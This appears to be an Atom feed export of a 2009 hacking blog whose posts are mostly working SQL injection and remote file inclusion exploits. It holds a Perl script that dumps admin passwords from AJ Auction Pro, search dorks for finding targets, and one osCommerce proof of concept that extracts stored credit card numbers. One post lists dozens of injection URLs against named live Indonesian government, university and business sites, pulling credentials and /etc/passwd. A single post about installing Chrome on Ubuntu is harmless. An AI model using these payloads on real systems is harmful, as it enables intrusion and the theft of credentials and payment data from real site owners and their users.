/&gt;my $file_vuln = '/store.php?id=';&lt;br /&gt;my $sql_query = '-null+union+select+1,2,3,4,5,group_concat(0x3a,user_name,0x3a,password,0x3a),7,8,9,10+from+admin--';&lt;br /&gt;print "\n[x]===============================================[x]\n";&lt;br /&gt;print "[x] AJ Auction Pro OOPD 2.x SQL Injection Exploit [x]\n";&lt;br /&gt;print "[x]                [C]oded By NoGe                [x]\n";&lt;br /&gt;print "[x]===============================================[x]\n\n";&lt;br /&gt;&lt;br /&gt;my $exploit = "http://".$target.$file_vuln.$sql_query;&lt;br /&gt;&lt;br /&gt;my $request   = HTTP::Request-&gt;new(GET=&gt;$exploit);&lt;br /&gt;my $useragent = LWP::UserAgent-&gt;new();&lt;br /&gt;$useragent-&gt;timeout(10);&lt;br /&gt;my $response  = $useragent-&gt;request($request);&lt;br /&gt;if ($response-&gt;is_success) {&lt;br /&gt;my $res   = $response-&gt;content;&lt;br /&gt;if ($res =~ m/:(.*):(.*):/g) {&lt;br /&gt;my ($username,$password) = ($1,$2);&lt;br /&gt;print "[+] $username:$password \n\n";&lt;br /&gt;}&lt;br /&gt;else { print "[-] Error, Fail to get admin login.\n\n"; }&lt;br /&gt;}&lt;br /&gt;else { print "[-] Error, ".$response-&gt;status_line."\n\n"; }&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-859011306573639162?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/859011306573639162/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=859011306573639162' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/859011306573639162'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/859011306573639162'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/08/aj-auction-pro-oopd-2x-sql-injection.html' title='AJ Auction Pro OOPD 2.x SQL Injection Exploit'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-131599195667216365</id><published>2009-08-16T00:26:00.004+07:00</published><updated>2009-08-20T03:01:54.551+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>BrooWaha Engine 2.0.71 SQL Injection Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] BrooWaha Engine 2.0.71 SQL Injection Vulnerability&lt;br /&gt;&lt;/span&gt;Software : BrooWaha Engine 2.0.71&lt;br /&gt;Vendor   : http://www.broowaha.com/&lt;br /&gt;Author   : NoGe&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;image.php&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;br /&gt;&lt;/span&gt;http://localhost/[path]/image.php?id==[SQL]&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;[o] Proof of concept&lt;br /&gt;&lt;/span&gt;http://london.broowaha.com/image.php?id=-5851+AND+1=2+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),1/*&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] Dork&lt;br /&gt;&lt;/span&gt;"Powered by BrooWaha Engine"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Note&lt;br /&gt;&lt;/span&gt;if you dont see the result, view the page source and you will see it. :)&lt;br /&gt;the result from the example above will be like this after you view the page source.&lt;br /&gt;4.0.27-max-log:db162098511:dbo162098511@74.208.16.88/-5851&lt;br /&gt;this is a private script and all target are in one IP address.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-131599195667216365?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/131599195667216365/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=131599195667216365' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/131599195667216365'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/131599195667216365'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/08/broowaha-engine-2071-sql-injection-vuln.html' title='BrooWaha Engine 2.0.71 SQL Injection Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-3044002778755783580</id><published>2009-08-13T11:30:00.008+07:00</published><updated>2009-08-20T03:03:29.980+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>Indonesian Vuln Sites [ part four ]</title><content type='html'>&lt;pre&gt;&lt;br /&gt;http://stabmaitreyawira.ac.id/news_detail.php?id=-2+union+select+1,2,3,4,group_concat(username,0x3a,password),6+from+user--&lt;br /&gt;&lt;br /&gt;http://www.nganjukkab.go.id/ina/pariwisata/event.php?id=-1+union+select+1,2,3,group_concat(loginname,0x3a,password),5,6,7,8+from+portaluser--&lt;br /&gt;&lt;br /&gt;http://www.quindo.co.id/english/event.php?id=-2+union+select+1,database(),3,group_concat(username,0x3a,password),5,6,7,8,9,10,11+from+admin--&lt;br /&gt;&lt;br /&gt;http://www.stmikpontianak.ac.id/event.php?id=-24+union+select+1,2,database(),4,version(),6,7,8,9--&lt;br /&gt;&lt;br /&gt;http://www.imjakarta.com/olympic/detail/info.php?id=-12+union+select+1,database(),group_concat(auto_id,0x3a,aid,0x3a,password),4+from+ms_admin--&lt;br /&gt;&lt;br /&gt;http://www.direktori-perdamaian.org/ina/event.php?id=-14+union+select+user(),database(),version()--&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;http://www.oasislestari.com/event.php?id=-167+union+select+1,2,group_concat(userid,0x3a,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+tbadmin--&lt;br /&gt;&lt;br /&gt;http://www.an.tv/s/?sid=4+AND+1=2+UNION+SELECT+concat(user,0x3a,password),1+FROM+mysql.user/*&lt;br /&gt;&lt;br /&gt;http://www.an.tv/s/?sid=4+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764),1/*&lt;br /&gt;&lt;br /&gt;http://sap.gunadarma.ac.id/index.php?stateid=search&amp;amp;substep=detailkul&amp;amp;id=-1136+union+select+1,2,3,unhex(hex(@@version)),5,6,7--&lt;br /&gt;&lt;br /&gt;http://www.indonesianeyes.com/news.php?id=-59+union+select+1,user(),version(),4,5,6--&lt;br /&gt;&lt;br /&gt;http://www.aptik.or.id/news.php?session=details&amp;amp;newsID=-20060705103857+union+select+1,group_concat(email,0x3a,password),3,4,5,6,7,8,9+from+admin--&lt;br /&gt;&lt;br /&gt;http://ia-smandu.org/berita.php?id=-14%20union+select+1,version(),database(),user(),5,6--&lt;br /&gt;&lt;br /&gt;http://www.pustakabersama.net/buku.php?id=37357+AND+1=2+UNION+SELECT+0,1,version(),3,4,5,6--&lt;br /&gt;&lt;br /&gt;http://www.inixindojogja.com/detailnews.php?id=-127+union+select+1,2,3,4,5,group_concat(username,0x3a,password),7,8+from+admin--&lt;br /&gt;&lt;br /&gt;http://balidiscoveryconsulting.com/detailNews.php?id=-3+union+select+1,2,version(),4--&lt;br /&gt;&lt;br /&gt;http://kickandy.com/sendfriend.php?ar_id=-1527+union+select+1,2,database(),group_concat(User_Name,0x3a,User_Password),5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+tbl_user--&lt;br /&gt;&lt;br /&gt;http://www.kkppi.go.id/baru/job.php?mode=baca&amp;amp;catinfo_id=-2+union+select+1,2,3,4,group_concat(Login_name,0x3a,Password,0x3a,Email),6,7,8,9,10+from+tb_user--&lt;br /&gt;&lt;br /&gt;http://pksm.mercubuana.ac.id/new/news.php?mode=baca&amp;amp;news_id=28+AND+1=2+UNION+SELECT+0,1,2,load_file(0x2f6574632f706173737764),4,5,6,7/*&lt;br /&gt;&lt;br /&gt;http://ikatanbankir.com/ibi/news.php?id=-11+union+select+1,2,3,group_concat(username,0x3a,password),5,6,7,8+from+user--&lt;br /&gt;&lt;br /&gt;http://total-ban.promedia-int.com/total/article.php?id=-3+union+select+1,database(),3,group_concat(username,0x3a,password),5,6,7,8+from+user--&lt;br /&gt;&lt;br /&gt;http://maknyoess.com/web/news.php?id=-24+union+select+1,user(),3,group_concat(username,0x3a,password),5,6,7,8+from+user--&lt;br /&gt;&lt;br /&gt;http://www.bli-online.com/bli/index.php?go=news.detail&amp;amp;idnews=-865+union+select+1,2,3,4,5,database(),7,group_concat(username,0x3a,password),9,10,11,12+from+td_users--&lt;br /&gt;&lt;br /&gt;http://www.earthhour.wwf.or.id/news_detail.php?id=25+AND+1=2+UNION+SELECT+0,group_concat(username,0x3a,password),2,3,4+from+user/*&lt;br /&gt;&lt;br /&gt;http://www.sonymusic.co.id/album81.php?id=-840+union+select+1,2,3,version(),5,6,7,8,9,10,11,12--&lt;br /&gt;&lt;br /&gt;http://nexian.co.id/product.php?p=cdma&amp;amp;t=6+AND+1=2+UNION+SELECT+0,1,2,concat_ws(0x3a,user_id,username,password,lastlogin),4,5,6,7,8+from+users--&lt;br /&gt;&lt;br /&gt;http://www.ernijulia.com/v4/buku.php?id=-16+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+admin--&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-3044002778755783580?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/3044002778755783580/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=3044002778755783580' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3044002778755783580'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/3044002778755783580'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/08/indonesian-vuln-sites-part-four.html' title='Indonesian Vuln Sites [ part four ]'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-1089514260949657225</id><published>2009-08-06T03:12:00.003+07:00</published><updated>2009-08-20T03:12:16.606+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='linux'/><title type='text'>How to install Google Chrome on ubuntu</title><content type='html'>&lt;pre&gt;&lt;br /&gt;this is the Codeweavers CrossOver chrome package which will do for now&lt;br /&gt;until a native linux version is released!&lt;br /&gt;&lt;br /&gt;download one of the ubuntu versions that applies to you&lt;br /&gt;&lt;br /&gt;&lt;a href="http://media.codeweavers.com/pub/crossover/chromium/cxchromium_0.9.0-1_i386.deb"&gt;CrossOver Chromium Ubuntu and Debian [32 bit]&lt;/a&gt;&lt;br /&gt;&lt;a href="http://media.codeweavers.com/pub/crossover/chromium/ia32-cxchromium_0.9.0-1_amd64.deb"&gt;CrossOver Chromium Ubuntu and Debian [64 bit]&lt;/a&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;after download it, double click the &lt;span style="font-weight: bold;"&gt;deb&lt;/span&gt; file.&lt;br /&gt;click &lt;span style="font-weight: bold;"&gt;Install Package&lt;/span&gt;.&lt;br /&gt;fill in your sudo password.&lt;br /&gt;&lt;br /&gt;to open it go here..&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Applications &gt;&gt; CrossOver Chromium &gt;&gt; Chromium&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;you can download CrossOver Chromium for another distro too..&lt;br /&gt;&lt;br /&gt;&lt;a href="http://media.codeweavers.com/pub/crossover/chromium/cxchromium-0.9.0-1.i386.rpm"&gt;CrossOver Chromium Red Hat, Mandriva and SUSE&lt;/a&gt;&lt;br /&gt;&lt;a href="http://media.codeweavers.com/pub/crossover/chromium/install-cxchromium-0.9.0.shhttp://media.codeweavers.com/pub/crossover/chromium/install-cxchromium-0.9.0.sh"&gt;CrossOver Chromium for all other linux distros&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-1089514260949657225?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/1089514260949657225/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=1089514260949657225' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1089514260949657225'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/1089514260949657225'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/08/how-to-install-google-chrome-on-ubuntu.html' title='How to install Google Chrome on ubuntu'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-716914350049584392</id><published>2009-08-05T22:31:00.003+07:00</published><updated>2009-08-20T03:12:52.549+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>osCommerce SQL Injection Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] osCommerce SQL Injection Vulnerability&lt;br /&gt;&lt;/span&gt;Software : osCommerce&lt;br /&gt;Vendor   : http://www.oscommerce.com/&lt;br /&gt;Download : http://www.oscommerce.com/solutions/downloads/&lt;br /&gt;Author   : NoGe&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;links.php&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;br /&gt;&lt;/span&gt;http://localhost/[path]/links.php?link_id==[SQL]&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;[o] Proof of concept&lt;br /&gt;&lt;/span&gt;http://www.sportmueller-pocking.de/catalog/links.php?link_id=12661+AND+1=2+UNION+SELECT+0,1,group_concat%28cc_type,0x3a,cc_owner,0x3a,cc_number,0x3a,cc_expires%29,3,4,5,6,7,8+from+orders/*&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] Dork&lt;br /&gt;&lt;/span&gt;"Powered by osCommerce"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Note&lt;/span&gt;&lt;br /&gt;i dont know which version of this osCommerce but its vulnerable.&lt;br /&gt;target not to much so i think this is an old version.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-716914350049584392?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/716914350049584392/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=716914350049584392' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/716914350049584392'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/716914350049584392'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/08/oscommerce-sql-injection-vuln.html' title='osCommerce SQL Injection Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2154107773988518274</id><published>2009-07-30T05:13:00.002+07:00</published><updated>2009-08-20T03:13:19.913+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>linkSpheric 0.74 Beta 6 SQL Injection Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] linkSpheric 0.74 Beta 6 SQL Injection Vulnerability&lt;br /&gt;&lt;/span&gt;Software : linkSpheric version 0.74 Beta 6&lt;br /&gt;Vendor   : http://dataspheric.com/&lt;br /&gt;Download : http://sourceforge.net/projects/linkspheric/&lt;br /&gt;Author   : NoGe&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;viewListing.php&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;br /&gt;&lt;/span&gt;http://localhost/[path]/viewListing.php?listID=[SQL]&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;[o] Proof of concept&lt;br /&gt;&lt;/span&gt;http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--&lt;br /&gt;http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] Dork&lt;br /&gt;&lt;/span&gt;"Powered by linkSpheric"&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2154107773988518274?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2154107773988518274/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2154107773988518274' title='11 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2154107773988518274'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2154107773988518274'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/07/linkspheric-074-beta-6-sql-inejction.html' title='linkSpheric 0.74 Beta 6 SQL Injection Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>11</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-4541171779971459114</id><published>2009-07-30T05:09:00.003+07:00</published><updated>2009-08-20T03:13:56.107+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>MAXcms - Databay Content Management System 3.11.20b Multiple RFI Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] MAXcms - Databay Content Management System 3.11.20b Multiple Remote File Inclusion Vulnerability&lt;br /&gt;&lt;/span&gt;Software : MAXcms - Databay Content Management System version 3.11.20b&lt;br /&gt;Vendor   : http://www.databay.de&lt;br /&gt;Download : http://downloads.sourceforge.net/micro-cms/microcms.zip&lt;br /&gt;Author   : NoGe&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;is_projectPath parameter&lt;br /&gt;includes/InstantSite/inc.is_root.php&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;GLOBALS[thCMS_root] parameter&lt;br /&gt;classes/class.Tree.php&lt;br /&gt;includes/inc.thcms_admin_mediamanager.php&lt;br /&gt;modul/mod.rssreader.php&lt;br /&gt;&lt;br /&gt;is_path parameter&lt;br /&gt;classes/class.tasklist.php&lt;br /&gt;classes/class.thcms.php&lt;br /&gt;classes/class.thcms_content.php&lt;br /&gt;classes/class.thcms_modul_parent.php&lt;br /&gt;classes/class.thcms_page.php&lt;br /&gt;classes/class.thcsm_user.php&lt;br /&gt;includes/InstantSite/class.Tree.php&lt;br /&gt;&lt;br /&gt;thCMS_root parameter&lt;br /&gt;classes/class.thcms_modul.php&lt;br /&gt;includes/inc.page_edit_tasklist.php&lt;br /&gt;includes/inc.thcms_admin_overview_backup.php&lt;br /&gt;includes/inc.thcms_edit_content.php&lt;br /&gt;modul/class.thcms_modul_parent_xml.php&lt;br /&gt;modul/mod.cmstranslator.php&lt;br /&gt;modul/mod.download.php&lt;br /&gt;modul/mod.faq.php&lt;br /&gt;modul/mod.guestbook.php&lt;br /&gt;modul/mod.html.php&lt;br /&gt;modul/mod.menu.php&lt;br /&gt;modul/mod.news.php&lt;br /&gt;modul/mod.newsticker.php&lt;br /&gt;modul/mod.rss.php&lt;br /&gt;modul/mod.search.php&lt;br /&gt;modul/mod.sendtofriend.php&lt;br /&gt;modul/mod.sitemap.php&lt;br /&gt;modul/mod.tagdoc.php&lt;br /&gt;modul/mod.template.php&lt;br /&gt;modul/mod.test.php&lt;br /&gt;modul/mod.text.php&lt;br /&gt;modul/mod.upload.php&lt;br /&gt;modul/mod.users.php&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/includes/InstantSite/inc.is_root.php?is_projectPath=[evilc0de]&lt;br /&gt;http://localhost/[path]/classes/class.Tree.php?GLOBALS[thCMS_root]=[evilc0de]&lt;br /&gt;http://localhost/[path]/classes/class.thcsm_user.php?is_path=[evilc0de]&lt;br /&gt;http://localhost/[path]/modul/mod.users.php?thCMS_root=[evilc0de]&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-4541171779971459114?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/4541171779971459114/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=4541171779971459114' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4541171779971459114'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4541171779971459114'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/07/maxcms-databay-content-management.html' title='MAXcms - Databay Content Management System 3.11.20b Multiple RFI Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-2994148370595777408</id><published>2009-07-29T18:05:00.000+07:00</published><updated>2009-07-29T18:13:43.578+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tutorial'/><title type='text'>Bypass Mikrotik Router</title><content type='html'>&lt;pre&gt;&lt;br /&gt;sedikit tutorial tentang gimana bypass Mikrotik Router.&lt;br /&gt;&lt;br /&gt;download videonya &lt;a href="http://www.4shared.com/file/121457871/df3fbaac/mikrotik.html"&gt;disini&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;thx to bob :)&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-2994148370595777408?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/2994148370595777408/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=2994148370595777408' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2994148370595777408'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/2994148370595777408'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/07/bypass-mikrotik-router.html' title='Bypass Mikrotik Router'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='http://4.bp.blogspot.com/_dxtzvQwAPwE/SRcdIvto7MI/AAAAAAAAAAk/JYnNtKA6xmo/S220/3573803839073l.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8067811077743031893.post-4739132059784218</id><published>2009-07-29T03:28:00.001+07:00</published><updated>2009-07-29T03:31:42.908+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='vulnerabilities'/><title type='text'>Ultrize TimeSheet 1.2.2 Remote File Inclusion Vuln</title><content type='html'>&lt;pre&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;[o] Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability&lt;br /&gt;&lt;/span&gt;Software : Ultrize TimeSheet version 1.2.2&lt;br /&gt;Vendor   : http://www.ultrize.com/&lt;br /&gt;Download : http://www.ultrize.com/timesheet/download/timeSheet-20080505.zip&lt;br /&gt;Author   : NoGe&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Vulnerable file&lt;/span&gt;&lt;br /&gt;include($config['include_dir'].'timesheet.class.php');&lt;br /&gt;include/timesheet.php&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;[o] Exploit&lt;/span&gt;&lt;br /&gt;http://localhost/[path]/include/timesheet.php?config[include_dir]=[evilc0de]&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8067811077743031893-4739132059784218?l=evilc0de.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilc0de.blogspot.com/feeds/4739132059784218/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8067811077743031893&amp;postID=4739132059784218' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4739132059784218'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8067811077743031893/posts/default/4739132059784218'/><link rel='alternate' type='text/html' href='http://evilc0de.blogspot.com/2009/07/ultrize-timesheet-122-remote-file.html' title='Ultrize TimeSheet 1.2.2 Remote File Inclusion Vuln'/><author><name>NoGe</name><uri>http://www.blogger.com/profile/11265030747061662385</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' 